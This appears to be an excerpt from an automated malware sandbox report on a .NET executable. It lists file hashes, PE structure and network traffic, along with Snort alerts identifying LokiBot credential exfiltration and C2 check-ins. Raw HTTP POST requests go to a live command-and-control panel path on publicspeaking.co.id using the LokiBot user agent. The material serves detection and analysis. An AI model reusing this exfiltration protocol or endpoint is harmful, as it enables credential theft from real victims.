          SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
          SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
          SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
          Malicious: false
          Reputation: high, very likely benign file
          Preview: 1

          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
          Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          File Type: data
          Category: dropped
          Size (bytes): 46
          Entropy (8bit): 1.0424600748477153
          Encrypted: false
          SSDEEP: 3:/lbON:u
          MD5: 89CA7E02D8B79ED50986F098D5686EC9
          SHA1: A602E0D4398F00C827BFCF711066E67718CA1377
          SHA-256: 30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
          SHA-512: C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
          Malicious: false
          Reputation: moderate, very likely benign file
          Preview: ........................................user.

          Static File Info

          General

          File type: MS-DOS executable, MZ for MS-DOS
          Entropy (8bit): 6.749521559151111
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          File size: 359690
          MD5: 2ae5473d26a235b7ab3ee2d632514d60
          SHA1: 40cbf4bffbe3a0c691aaac5e51ab93764958e5b9
          SHA256: fadae8a98643b8305b18d587f3cc16534eacd884e84753c92e1e64c3336d91c3
          SHA512: 312097313dbc84c15aa21c92f400db0ff6dd0b96164b184fee237924fcade692199f3e107d1e89d1cf0fc0a8f5e555cce4eb766b8ab4ea3c658cbe6e14be7761
          SSDEEP: 3072:7m2CthMHk2YOOOOOuOOOOOOqYOOOOO8GOOOOOOKMooMJMoMFYYYYYYYYYYYYYYNb:Ct+HgjobF4Equ0HQlLU6j7DkZ9ZWnn
          File Content Preview: MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.....................................................

          File Icon

          Icon Hash: 00828e8e8686b000

          Static PE Info

          General

          Entrypoint: 0x402e5e
          Entrypoint Section: .text
          Digitally signed: false
          Imagebase: 0x400000
          Subsystem: windows gui
          Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp: 0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
          TLS Callbacks:
          CLR (.Net) Version: v4.0.30319
          OS Version Major: 4
          OS Version Minor: 0
          File Version Major: 4
          File Version Minor: 0
          Subsystem Version Major: 4
          Subsystem Version Minor: 0
          Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al

          Data Directories

          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e0c | 0x4f | .text
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x28da6 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0xc | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

          Sections

          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x2000 | 0xe64 | 0x1000 | False | 0.5478515625 | data | 5.29520838324 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rsrc | 0x4000 | 0x28da6 | 0x28e00 | False | 0.212520307722 | data | 5.09516700999 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x2e000 | 0xc | 0x200 | False | 1.021484375 | data | 6.65643552127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          Name | RVA | Size | Type | Language | Country
          RT_ICON | 0x42f4 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
          RT_ICON | 0x14b1c | 0x94a8 | data | English | United States
          RT_ICON | 0x1dfc4 | 0x5488 | data | English | United States
          RT_ICON | 0x2344c | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 8454143, next used block 4294901760 | English | United States
          RT_ICON | 0x27674 | 0x25a8 | data | English | United States
          RT_ICON | 0x29c1c | 0x10a8 | data | English | United States
          RT_ICON | 0x2acc4 | 0x988 | data | English | United States
          RT_ICON | 0x2b64c | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
          RT_ICON | 0x2bab4 | 0xea8 | data | |
          RT_GROUP_ICON | 0x2c95c | 0x14 | data | |
          RT_VERSION | 0x2c9e8 | 0x1d4 | data | English | United States
          RT_MANIFEST | 0x2cbbc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

          Imports

          DLL | Import
          mscoree.dll | _CorExeMain

          Version Infos

          Description | Data
          LegalCopyright | Copyright VIRTUAL 2017
          ProductName | VirtualController
          FileDescription | Virtual Controller
          Translation | 0x0409 0x04b0

          Possible Origin

          Language of compilation system | Country where language is spoken
          English | United States

          Network Behavior

          Snort IDS Alerts

          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
          11/20/21-21:37:03.277833 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:03.277833 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:03.277833 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:03.277833 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:04.623197 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:04.623197 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:04.623197 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:04.623197 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:05.859359 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:05.859359 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:05.859359 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:05.859359 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          11/20/21-21:37:06.967168 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:06.967168 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:06.967168 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          11/20/21-21:37:06.967168 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49744 | 80 | 192.168.2.3 | 216.239.34.21

          Network Port Distribution

          TCP Packets

          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Nov 20, 2021 21:37:03.248497009 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.274408102 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:03.275115013 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.277832985 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.303780079 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:03.303878069 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.329621077 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:03.337706089 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:03.337750912 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:03.337831020 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.337902069 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.646559000 CET | 49741 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:03.672894001 CET | 80 | 49741 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.600872040 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.620438099 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.620603085 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.623197079 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.642554998 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.642651081 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.662858009 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.670073986 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.670263052 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.670502901 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:04.670558929 CET | 49742 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:04.691240072 CET | 80 | 49742 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.831028938 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.856354952 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.856487989 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.859359026 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.884496927 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.884594917 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.909878969 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.926323891 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.926368952 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:05.926462889 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.926676989 CET | 49743 | 80 | 192.168.2.3 | 216.239.36.21
          Nov 20, 2021 21:37:05.951792002 CET | 80 | 49743 | 216.239.36.21 | 192.168.2.3
          Nov 20, 2021 21:37:06.937807083 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:06.961808920 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:06.964364052 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:06.967168093 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:06.990865946 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:06.992532015 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:07.018135071 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:07.026791096 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:07.026839972 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3
          Nov 20, 2021 21:37:07.026916981 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:07.026958942 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:07.334486008 CET | 49744 | 80 | 192.168.2.3 | 216.239.34.21
          Nov 20, 2021 21:37:07.360106945 CET | 80 | 49744 | 216.239.34.21 | 192.168.2.3

          UDP Packets

          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Nov 20, 2021 21:37:03.204025030 CET | 58045 | 53 | 192.168.2.3 | 8.8.8.8
          Nov 20, 2021 21:37:03.237479925 CET | 53 | 58045 | 8.8.8.8 | 192.168.2.3
          Nov 20, 2021 21:37:04.514970064 CET | 57459 | 53 | 192.168.2.3 | 8.8.8.8
          Nov 20, 2021 21:37:04.598186970 CET | 53 | 57459 | 8.8.8.8 | 192.168.2.3
          Nov 20, 2021 21:37:05.809151888 CET | 57875 | 53 | 192.168.2.3 | 8.8.8.8
          Nov 20, 2021 21:37:05.829185009 CET | 53 | 57875 | 8.8.8.8 | 192.168.2.3
          Nov 20, 2021 21:37:06.913052082 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8
          Nov 20, 2021 21:37:06.932966948 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3

          DNS Queries

          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
          Nov 20, 2021 21:37:03.204025030 CET | 192.168.2.3 | 8.8.8.8 | 0x65c0 | Standard query (0) | publicspeaking.co.id | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:04.514970064 CET | 192.168.2.3 | 8.8.8.8 | 0xece0 | Standard query (0) | publicspeaking.co.id | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:05.809151888 CET | 192.168.2.3 | 8.8.8.8 | 0xf600 | Standard query (0) | publicspeaking.co.id | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:06.913052082 CET | 192.168.2.3 | 8.8.8.8 | 0xa232 | Standard query (0) | publicspeaking.co.id | A (IP address) | IN (0x0001)

          DNS Answers

          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
          Nov 20, 2021 21:37:03.237479925 CET | 8.8.8.8 | 192.168.2.3 | 0x65c0 | No error (0) | publicspeaking.co.id | | 216.239.36.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET | 8.8.8.8 | 192.168.2.3 | 0x65c0 | No error (0) | publicspeaking.co.id | | 216.239.38.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET | 8.8.8.8 | 192.168.2.3 | 0x65c0 | No error (0) | publicspeaking.co.id | | 216.239.32.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET | 8.8.8.8 | 192.168.2.3 | 0x65c0 | No error (0) | publicspeaking.co.id | | 216.239.34.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET | 8.8.8.8 | 192.168.2.3 | 0xece0 | No error (0) | publicspeaking.co.id | | 216.239.34.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET | 8.8.8.8 | 192.168.2.3 | 0xece0 | No error (0) | publicspeaking.co.id | | 216.239.38.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET | 8.8.8.8 | 192.168.2.3 | 0xece0 | No error (0) | publicspeaking.co.id | | 216.239.32.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET | 8.8.8.8 | 192.168.2.3 | 0xece0 | No error (0) | publicspeaking.co.id | | 216.239.36.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET | 8.8.8.8 | 192.168.2.3 | 0xf600 | No error (0) | publicspeaking.co.id | | 216.239.36.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET | 8.8.8.8 | 192.168.2.3 | 0xf600 | No error (0) | publicspeaking.co.id | | 216.239.38.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET | 8.8.8.8 | 192.168.2.3 | 0xf600 | No error (0) | publicspeaking.co.id | | 216.239.32.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET | 8.8.8.8 | 192.168.2.3 | 0xf600 | No error (0) | publicspeaking.co.id | | 216.239.34.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET | 8.8.8.8 | 192.168.2.3 | 0xa232 | No error (0) | publicspeaking.co.id | | 216.239.34.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET | 8.8.8.8 | 192.168.2.3 | 0xa232 | No error (0) | publicspeaking.co.id | | 216.239.38.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET | 8.8.8.8 | 192.168.2.3 | 0xa232 | No error (0) | publicspeaking.co.id | | 216.239.32.21 | A (IP address) | IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET | 8.8.8.8 | 192.168.2.3 | 0xa232 | No error (0) | publicspeaking.co.id | | 216.239.36.21 | A (IP address) | IN (0x0001)

          HTTP Request Dependency Graph

          • publicspeaking.co.id

          HTTP Packets

          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          0 | 192.168.2.3 | 49741 | 216.239.36.21 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Timestamp | kBytes transferred | Direction | Data
          Nov 20, 2021 21:37:03.277832985 CET | 1229 | OUT | POST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 190
          Connection: close
          Nov 20, 2021 21:37:03.303878069 CET | 1229 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: 'ckav.ruhardz721680DESKTOP-716T771k08F9C4E9C79A3B52B3F7394302zUgQ
          Nov 20, 2021 21:37:03.337706089 CET | 1229 | IN | HTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:03 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          1 | 192.168.2.3 | 49742 | 216.239.34.21 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Timestamp | kBytes transferred | Direction | Data
          Nov 20, 2021 21:37:04.623197079 CET | 1230 | OUT | POST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 190
          Connection: close
          Nov 20, 2021 21:37:04.642651081 CET | 1231 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: 'ckav.ruhardz721680DESKTOP-716T771+08F9C4E9C79A3B52B3F739430tTSS2
          Nov 20, 2021 21:37:04.670073986 CET | 1231 | IN | HTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:04 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          2 | 192.168.2.3 | 49743 | 216.239.36.21 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Timestamp | kBytes transferred | Direction | Data
          Nov 20, 2021 21:37:05.859359026 CET | 1232 | OUT | POST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 163
          Connection: close
          Nov 20, 2021 21:37:05.884594917 CET | 1233 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: (ckav.ruhardz721680DESKTOP-716T77108F9C4E9C79A3B52B3F739430
          Nov 20, 2021 21:37:05.926323891 CET | 1233 | IN | HTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:05 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          3 | 192.168.2.3 | 49744 | 216.239.34.21 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Timestamp | kBytes transferred | Direction | Data
          Nov 20, 2021 21:37:06.967168093 CET | 1234 | OUT | POST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 163
          Connection: close
          Nov 20, 2021 21:37:06.992532015 CET | 1234 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: (ckav.ruhardz721680DESKTOP-716T77108F9C4E9C79A3B52B3F739430
